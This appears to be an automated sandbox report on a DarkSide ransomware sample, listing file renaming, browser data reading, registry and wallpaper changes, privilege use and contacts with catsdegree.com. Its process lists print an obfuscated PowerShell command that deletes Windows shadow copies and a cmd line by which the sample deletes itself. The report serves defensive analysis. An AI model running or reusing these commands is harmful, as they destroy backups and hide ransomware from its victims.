Malware Analysis Report

2024-10-16 03:29

Sample ID 210517-zbnx1z48ba
Target sage2.donotopen
SHA256 b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8

Threat Level: Known bad

The file sage2.donotopen was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Deletes itself

Sets desktop wallpaper using registry

Enumerates physical storage devices

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Control Panel

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-05-17 14:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-05-17 14:07

Reported

2021-05-17 14:10

Platform

win7v20210410

Max time kernel

26s

Max time network

25s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectRead.crw => C:\Users\Admin\Pictures\SelectRead.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\DenyRequest.png => C:\Users\Admin\Pictures\DenyRequest.png.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyRequest.png.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectPop.raw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SelectRead.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\ConnectSet.crw => C:\Users\Admin\Pictures\ConnectSet.crw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\MergeProtect.tif => C:\Users\Admin\Pictures\MergeProtect.tif.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectPop.raw => C:\Users\Admin\Pictures\SelectPop.raw.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443 C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 8.8.8.8:53 16.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 24.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 13.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 15.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 1.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 19.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 21.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 20.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 25.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 32.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 35.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 38.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 40.0.7.10.in-addr.arpa udp
N/A 8.8.8.8:53 39.0.7.10.in-addr.arpa udp
N/A 10.7.0.13:5355 udp
N/A 10.7.0.16:5355 udp
N/A 10.7.0.19:5355 udp
N/A 10.7.0.15:5355 udp
N/A 10.7.0.21:5355 udp
N/A 10.7.0.25:5355 udp
N/A 10.7.0.20:5355 udp
N/A 10.7.0.32:5355 udp
N/A 10.7.0.35:5355 udp
N/A 10.7.0.38:5355 udp
N/A 10.7.0.40:5355 udp
N/A 10.7.0.39:5355 udp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp
N/A 72.52.178.23:443 catsdegree.com tcp

Files

memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp

memory/1616-60-0x0000000000000000-mapping.dmp

memory/1616-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp

memory/1616-62-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

memory/1616-63-0x000000001AC90000-0x000000001AC91000-memory.dmp

memory/1616-64-0x0000000002280000-0x0000000002281000-memory.dmp

memory/1616-66-0x000000001AC14000-0x000000001AC16000-memory.dmp

memory/1616-65-0x000000001AC10000-0x000000001AC12000-memory.dmp

memory/1616-67-0x0000000001F10000-0x0000000001F11000-memory.dmp

memory/1616-68-0x000000001C4C0000-0x000000001C4C1000-memory.dmp

memory/1616-69-0x000000001C590000-0x000000001C591000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 dab8d891d3796ee132d648b719db343c
SHA1 8eab3909265c184a9a26893589836f047591c54c
SHA256 7e2ec9da9919c4f541728636bfac5e74405033f0f7e7bd733c3e68d82349f786
SHA512 305ca5f6aff09b5d645b5ce1e74b5fe22227fa6d6d70c4ab3dd165b1a140857f929a1727ea341fff063d1dc39756d037d0aac2c10a8ea0f9757ad111edc90d87

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5fcb6bbfb6b9dfcc7478f6cfa20f8bf0
SHA1 3c0ac7025e2d9aa30ef10a51313d152307f46dd1
SHA256 4a2b89babae45fbedb1c4b80f696fbc89a8b13249789647f55c64cbb878e2a64
SHA512 be9c5563f3c7430369359dbb7a548d6135773ae49b11047eb8acb7fa5c849e979456c06a49b27dd0a862ef1886930e7ad3e182e265f43e6cf1bca70874b30fed

memory/2840-72-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-05-17 14:07

Reported

2021-05-17 14:10

Platform

win10v20210408

Max time kernel

60s

Max time network

69s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\SelectExport.crw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SkipStop.raw => C:\Users\Admin\Pictures\SkipStop.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipStop.raw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
File renamed C:\Users\Admin\Pictures\SelectExport.crw => C:\Users\Admin\Pictures\SelectExport.crw.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe

"C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 catsdegree.com udp
N/A 8.8.8.8:53 1.0.10.10.in-addr.arpa udp
N/A 8.8.8.8:53 catsdegree.com udp

Files

memory/3108-114-0x0000000000000000-mapping.dmp

memory/3108-120-0x000001589A210000-0x000001589A211000-memory.dmp

memory/3108-125-0x000001589A3C0000-0x000001589A3C1000-memory.dmp

memory/3108-127-0x00000158FEC83000-0x00000158FEC85000-memory.dmp

memory/3108-128-0x00000158FEC86000-0x00000158FEC88000-memory.dmp

memory/3108-126-0x00000158FEC80000-0x00000158FEC82000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 67fc7b646bf0ff4129cf65bd31753fd9
SHA1 7428127d16a308ccd3d4ec950b540f31616322a9
SHA256 c87bb7e6b1480fff5001ec8fe03aa2b8868efa618c5576445a0676aaa31764b3
SHA512 9f58daffe014a9797c7e1d035f9577eab060d7a22ebc6cc4f40b9e348793d3b4adf27506df7ef5add9c86c6ee7c70d1cc1cb8cc3e9f33d447d72feeb7a32f264

memory/4648-144-0x0000000000000000-mapping.dmp